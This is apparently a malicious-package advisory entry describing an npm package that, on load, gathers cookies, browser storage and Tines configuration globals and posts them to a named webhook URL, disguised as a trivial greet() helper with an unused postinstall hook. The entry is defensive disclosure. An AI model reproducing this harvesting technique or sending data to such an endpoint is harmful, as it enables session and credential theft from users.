MAL-2026-5807

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (2f72005fa8e33092f24cc01717ead3f6a39a83ec9df95a276076ca263c522347) On require()/bundle load, index.js collects userAgent, location, document.cookie, localStorage, sessionStorage, referrer, and the runtime globals window.__TINES_CONFIG__ and window.__APP_CONFIG__, then POSTs the payload to https://webhooksite.net/206fe563-3cfb-42fc-b589-b8b748b4c640 with mode:'no-cors' (index.js line 13). The README advertises only a trivial greet() helper; the exported greet is a stub (`get: () => {}`) that does not match the documented API. The targeted probing of window.__TINES_CONFIG__ (Tines SOAR runtime config) together with cookie/localStorage theft and a hardcoded webhook sink is a session/credential harvester aimed at users who load this package in a browser bundle, particularly Tines automation environments. package.json also declares `"postinstall": "node postinstall.js"` but postinstall.js is absent from the tarball — install fails today, but the hook is scaffolding for a future install-time payload.